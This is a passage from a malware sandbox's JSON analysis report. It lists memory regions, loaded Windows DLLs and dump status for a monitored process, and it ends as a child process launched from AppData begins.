was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 323584, "start_va": 1868234752, "type": "region", "version": 1 }, "end_va": 1868558335, "entry_point": 1868239954, "filename": "\\Windows\\System32\\webio.dll", "id": "region_842", "name": "webio.dll", "norm_filename": "c:\\windows\\system32\\webio.dll", "region_type": "memory_mapped_file", "start_va": 1868234752, "timestamp": "00:00:57.629", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1976434688, "type": "region", "version": 1 }, "end_va": 1977704447, "entry_point": 1976441653, "filename": "\\Windows\\System32\\urlmon.dll", "id": "region_843", "name": "urlmon.dll", "norm_filename": "c:\\windows\\system32\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1976434688, "timestamp": "00:00:57.633", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1998454784, "type": "region", "version": 1 }, "end_va": 1999458303, "entry_point": 1998461029, "filename": "\\Windows\\System32\\wininet.dll", "id": "region_844", "name": "wininet.dll", "norm_filename": "c:\\windows\\system32\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1998454784, "timestamp": "00:00:57.634", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1977810944, "type": "region", "version": 1 }, "end_va": 1979887615, "entry_point": 1977819865, "filename": "\\Windows\\System32\\iertutil.dll", "id": "region_845", "name": "iertutil.dll", "norm_filename": "c:\\windows\\system32\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1977810944, "timestamp": "00:00:57.636", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1970995200, "type": "region", "version": 1 }, "end_va": 1972162559, "entry_point": 1971000714, "filename": "\\Windows\\System32\\crypt32.dll", "id": "region_846", "name": "crypt32.dll", "norm_filename": "c:\\windows\\system32\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1970995200, "timestamp": "00:00:57.637", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1970798592, "type": "region", "version": 1 }, "end_va": 1970847743, "entry_point": 1970807694, "filename": "\\Windows\\System32\\msasn1.dll", "id": "region_847", "name": "msasn1.dll", "norm_filename": "c:\\windows\\system32\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1970798592, "timestamp": "00:00:57.638", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 110592, "start_va": 1969487872, "type": "region", "version": 1 }, "end_va": 1969598463, "entry_point": 1969525689, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_848", "name": "sspicli.dll", "norm_filename": "c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1969487872, "timestamp": "00:00:57.798", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 2945024, "start_va": 19922944, "type": "region", "version": 1 }, "end_va": 22867967, "entry_point": 19922944, "filename": "\\Windows\\Globalization\\Sorting\\SortDefault.nls", "id": "region_849", "name": "sortdefault.nls", "norm_filename": "c:\\windows\\globalization\\sorting\\sortdefault.nls", "region_type": "memory_mapped_file", "start_va": 19922944, "timestamp": "00:00:57.800", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000850-addr_0x00000000001e0000-size_0x000000000000d000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_157", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 53248, "start_va": 1966080, "type": "region", "version": 1 }, "end_va": 2019327, "entry_point": 0, "filename": null, "id": "region_850", "name": "private_0x00000000001e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 1966080, "timestamp": "00:00:57.870", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 12886016, "start_va": 1984888832, "type": "region", "version": 1 }, "end_va": 1997774847, "entry_point": 1985418753, "filename": "\\Windows\\System32\\shell32.dll", "id": "region_851", "name": "shell32.dll", "norm_filename": "c:\\windows\\system32\\shell32.dll", "region_type": "memory_mapped_file", "start_va": 1984888832, "timestamp": "00:00:59.712", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 94208, "start_va": 1960574976, "type": "region", "version": 1 }, "end_va": 1960669183, "entry_point": 1960582301, "filename": "\\Windows\\System32\\userenv.dll", "id": "region_852", "name": "userenv.dll", "norm_filename": "c:\\windows\\system32\\userenv.dll", "region_type": "memory_mapped_file", "start_va": 1960574976, "timestamp": "00:00:59.715", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 1970339840, "type": "region", "version": 1 }, "end_va": 1970384895, "entry_point": 1970346386, "filename": "\\Windows\\System32\\profapi.dll", "id": "region_853", "name": "profapi.dll", "norm_filename": "c:\\windows\\system32\\profapi.dll", "region_type": "memory_mapped_file", "start_va": 1970339840, "timestamp": "00:00:59.716", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 53248, "start_va": 1947860992, "type": "region", "version": 1 }, "end_va": 1947914239, "entry_point": 1947865568, "filename": "\\Windows\\System32\\wtsapi32.dll", "id": "region_854", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\system32\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 1947860992, "timestamp": "00:00:59.720", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2031616, "type": "region", "version": 1 }, "end_va": 2035711, "entry_point": 0, "filename": null, "id": "region_855", "name": "pagefile_0x00000000001f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2031616, "timestamp": "00:00:59.728", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 86016, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2248703, "entry_point": 0, "filename": null, "id": "region_856", "name": "pagefile_0x0000000000210000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2162688, "timestamp": "00:00:59.730", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000857-addr_0x00000000015d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_158", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 22872064, "type": "region", "version": 1 }, "end_va": 23920639, "entry_point": 0, "filename": null, "id": "region_857", "name": "private_0x00000000015d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 22872064, "timestamp": "00:01:01.745", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000858-addr_0x00000000016d0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_159", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 23920640, "type": "region", "version": 1 }, "end_va": 24969215, "entry_point": 0, "filename": null, "id": "region_858", "name": "private_0x00000000016d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 23920640, "timestamp": "00:01:01.745", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 376832, "start_va": 24969216, "type": "region", "version": 1 }, "end_va": 25346047, "entry_point": 24969216, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_859", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 24969216, "timestamp": "00:01:01.746", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000860-addr_0x000000007ffdb000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_160", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147332096, "type": "region", "version": 1 }, "end_va": 2147336191, "entry_point": 0, "filename": null, "id": "region_860", "name": "private_0x000000007ffdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147332096, "timestamp": "00:01:01.761", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000861-addr_0x000000007ffdc000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_161", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147336192, "type": "region", "version": 1 }, "end_va": 2147340287, "entry_point": 0, "filename": null, "id": "region_861", "name": "private_0x000000007ffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147336192, "timestamp": "00:01:01.761", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 376832, "start_va": 24969216, "type": "region", "version": 1 }, "end_va": 25346047, "entry_point": 25114041, "filename": "\\Windows\\System32\\rpcss.dll", "id": "region_862", "name": "rpcss.dll", "norm_filename": "c:\\windows\\system32\\rpcss.dll", "region_type": "memory_mapped_file", "start_va": 24969216, "timestamp": "00:01:01.763", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1969618944, "type": "region", "version": 1 }, "end_va": 1969668095, "entry_point": 1969623265, "filename": "\\Windows\\System32\\cryptbase.dll", "id": "region_863", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\system32\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1969618944, "timestamp": "00:01:01.766", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 262144, "start_va": 1942945792, "type": "region", "version": 1 }, "end_va": 1943207935, "entry_point": 1942987485, "filename": "\\Windows\\System32\\uxtheme.dll", "id": "region_864", "name": "uxtheme.dll", "norm_filename": "c:\\windows\\system32\\uxtheme.dll", "region_type": "memory_mapped_file", "start_va": 1942945792, "timestamp": "00:01:01.768", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000865-addr_0x00000000017d0000-size_0x0000000000180000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_162", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1572864, "start_va": 24969216, "type": "region", "version": 1 }, "end_va": 26542079, "entry_point": 0, "filename": null, "id": "region_865", "name": "private_0x00000000017d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 24969216, "timestamp": "00:01:01.772", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 913408, "start_va": 24969216, "type": "region", "version": 1 }, "end_va": 25882623, "entry_point": 0, "filename": null, "id": "region_866", "name": "pagefile_0x00000000017d0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 24969216, "timestamp": "00:01:01.776", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000867-addr_0x0000000001910000-size_0x0000000000040000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_163", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 262144, "start_va": 26279936, "type": "region", "version": 1 }, "end_va": 26542079, "entry_point": 0, "filename": null, "id": "region_867", "name": "private_0x0000000001910000", "norm_filename": null, "region_type": "private_memory", "start_va": 26279936, "timestamp": "00:01:01.776", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2170879, "entry_point": 0, "filename": null, "id": "region_868", "name": "pagefile_0x0000000000210000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2162688, "timestamp": "00:01:01.780", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1695744, "start_va": 1953431552, "type": "region", "version": 1 }, "end_va": 1955127295, "entry_point": 1953621685, "filename": "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "id": "region_869", "name": "comctl32.dll", "norm_filename": "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll", "region_type": "memory_mapped_file", "start_va": 1953431552, "timestamp": "00:01:01.781", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2232319, "entry_point": 2228224, "filename": "\\Windows\\WindowsShell.Manifest", "id": "region_870", "name": "windowsshell.manifest", "norm_filename": "c:\\windows\\windowsshell.manifest", "region_type": "memory_mapped_file", "start_va": 2228224, "timestamp": "00:01:01.784", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8192, "start_va": 2293760, "type": "region", "version": 1 }, "end_va": 2301951, "entry_point": 0, "filename": null, "id": "region_871", "name": "pagefile_0x0000000000230000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2293760, "timestamp": "00:01:01.790", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2228224, "type": "region", "version": 1 }, "end_va": 2232319, "entry_point": 0, "filename": null, "id": "region_872", "name": "pagefile_0x0000000000220000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2228224, "timestamp": "00:01:01.797", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 536576, "start_va": 1984299008, "type": "region", "version": 1 }, "end_va": 1984835583, "entry_point": 1984308178, "filename": "\\Windows\\System32\\clbcatq.dll", "id": "region_873", "name": "clbcatq.dll", "norm_filename": "c:\\windows\\system32\\clbcatq.dll", "region_type": "memory_mapped_file", "start_va": 1984299008, "timestamp": "00:01:01.798", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 2359296, "type": "region", "version": 1 }, "end_va": 2363391, "entry_point": 0, "filename": null, "id": "region_874", "name": "pagefile_0x0000000000240000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2359296, "timestamp": "00:01:01.799", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1952120832, "type": "region", "version": 1 }, "end_va": 1953124351, "entry_point": 1952189854, "filename": "\\Windows\\System32\\propsys.dll", "id": "region_875", "name": "propsys.dll", "norm_filename": "c:\\windows\\system32\\propsys.dll", "region_type": "memory_mapped_file", "start_va": 1952120832, "timestamp": "00:01:01.802", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 135168, "start_va": 1950744576, "type": "region", "version": 1 }, "end_va": 1950879743, "entry_point": 1950749790, "filename": "\\Windows\\System32\\ntmarta.dll", "id": "region_876", "name": "ntmarta.dll", "norm_filename": "c:\\windows\\system32\\ntmarta.dll", "region_type": "memory_mapped_file", "start_va": 1950744576, "timestamp": "00:01:01.804", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 282624, "start_va": 1981022208, "type": "region", "version": 1 }, "end_va": 1981304831, "entry_point": 1981026785, "filename": "\\Windows\\System32\\Wldap32.dll", "id": "region_877", "name": "wldap32.dll", "norm_filename": "c:\\windows\\system32\\wldap32.dll", "region_type": "memory_mapped_file", "start_va": 1981022208, "timestamp": "00:01:01.807", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2506751, "entry_point": 2490368, "filename": "\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db", "id": "region_878", "name": "cversions.1.db", "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db", "region_type": "memory_mapped_file", "start_va": 2490368, "timestamp": "00:01:01.810", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 131072, "start_va": 2555904, "type": "region", "version": 1 }, "end_va": 2686975, "entry_point": 2555904, "filename": "\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000015.db", "id": "region_879", "name": "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db", "norm_filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000015.db", "region_type": "memory_mapped_file", "start_va": 2555904, "timestamp": "00:01:01.811", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2691071, "entry_point": 0, "filename": null, "id": "region_880", "name": "pagefile_0x0000000000290000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2686976, "timestamp": "00:01:01.812", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 2490368, "type": "region", "version": 1 }, "end_va": 2506751, "entry_point": 2490368, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_881", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 2490368, "timestamp": "00:01:01.834", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 196608, "start_va": 3866624, "type": "region", "version": 1 }, "end_va": 4063231, "entry_point": 3866624, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000f.db", "id": "region_882", "name": "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000f.db", "region_type": "memory_mapped_file", "start_va": 3866624, "timestamp": "00:01:01.834", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 2752512, "type": "region", "version": 1 }, "end_va": 2768895, "entry_point": 2752512, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db", "id": "region_883", "name": "cversions.2.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db", "region_type": "memory_mapped_file", "start_va": 2752512, "timestamp": "00:01:01.838", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable" ], "ref_process_dump": null, "size": 417792, "start_va": 26542080, "type": "region", "version": 1 }, "end_va": 26959871, "entry_point": 26542080, "filename": "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db", "id": "region_884", "name": "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "norm_filename": "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db", "region_type": "memory_mapped_file", "start_va": 26542080, "timestamp": "00:01:01.838", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4067327, "entry_point": 0, "filename": null, "id": "region_885", "name": "pagefile_0x00000000003e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4063232, "timestamp": "00:01:01.850", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 73728, "start_va": 1970864128, "type": "region", "version": 1 }, "end_va": 1970937855, "entry_point": 1970869313, "filename": "\\Windows\\System32\\devobj.dll", "id": "region_891", "name": "devobj.dll", "norm_filename": "c:\\windows\\system32\\devobj.dll", "region_type": "memory_mapped_file", "start_va": 1970864128, "timestamp": "00:01:01.856", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 159744, "start_va": 1973092352, "type": "region", "version": 1 }, "end_va": 1973252095, "entry_point": 1973115065, "filename": "\\Windows\\System32\\cfgmgr32.dll", "id": "region_892", "name": "cfgmgr32.dll", "norm_filename": "c:\\windows\\system32\\cfgmgr32.dll", "region_type": "memory_mapped_file", "start_va": 1973092352, "timestamp": "00:01:01.856", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1691648, "start_va": 1981349888, "type": "region", "version": 1 }, "end_va": 1983041535, "entry_point": 1981356007, "filename": "\\Windows\\System32\\setupapi.dll", "id": "region_893", "name": "setupapi.dll", "norm_filename": "c:\\windows\\system32\\setupapi.dll", "region_type": "memory_mapped_file", "start_va": 1981349888, "timestamp": "00:01:01.858", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 4063232, "type": "region", "version": 1 }, "end_va": 4091903, "entry_point": 0, "filename": null, "id": "region_894", "name": "pagefile_0x00000000003e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4063232, "timestamp": "00:01:01.884", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 4128768, "type": "region", "version": 1 }, "end_va": 4136959, "entry_point": 0, "filename": null, "id": "region_895", "name": "pagefile_0x00000000003f0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 4128768, "timestamp": "00:01:01.884", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 25886720, "type": "region", "version": 1 }, "end_va": 25890815, "entry_point": 0, "filename": null, "id": "region_896", "name": "pagefile_0x00000000018b0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 25886720, "timestamp": "00:01:01.884", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4141056, "start_va": 27000832, "type": "region", "version": 1 }, "end_va": 31141887, "entry_point": 0, "filename": null, "id": "region_897", "name": "pagefile_0x00000000019c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 27000832, "timestamp": "00:01:01.885", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000898-addr_0x0000000001dc0000-size_0x0000000000100000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_164", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 1048576, "start_va": 31195136, "type": "region", "version": 1 }, "end_va": 32243711, "entry_point": 0, "filename": null, "id": "region_898", "name": "private_0x0000000001dc0000", "norm_filename": null, "region_type": "private_memory", "start_va": 31195136, "timestamp": "00:01:01.885", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000004-region_00000899-addr_0x000000007ffda000-size_0x0000000000001000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_165", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 4096, "start_va": 2147328000, "type": "region", "version": 1 }, "end_va": 2147332095, "entry_point": 0, "filename": null, "id": "region_899", "name": "private_0x000000007ffda000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147328000, "timestamp": "00:01:01.885", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 1964900352, "type": "region", "version": 1 }, "end_va": 1964990463, "entry_point": 1964912067, "filename": "\\Windows\\System32\\cryptsp.dll", "id": "region_935", "name": "cryptsp.dll", "norm_filename": "c:\\windows\\system32\\cryptsp.dll", "region_type": "memory_mapped_file", "start_va": 1964900352, "timestamp": "00:01:01.925", "type": "region", "version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Users\\ATVeyDl98Z\\AppData\\Local\\Microsoft\\Windows\\viewcom.exe\"", "filename": "c:\\users\\atveydl98z\\appdata\\local\\microsoft\\windows\\viewcom.exe", "id": "proc_5", "image_name": "viewcom.exe", "monitor_reason": "child_process", "monitored_id": 5, "origin_monitor_id": 4, "ref_parent_process": { "ref_id": "proc_4", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "process_00000005-region_00000936-addr_0x0000000000010000-size_0x0000000000020000-perm_rw.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "readable", "writable" ], "ref_process_dump": { "ref_id": "proc_dump_166", 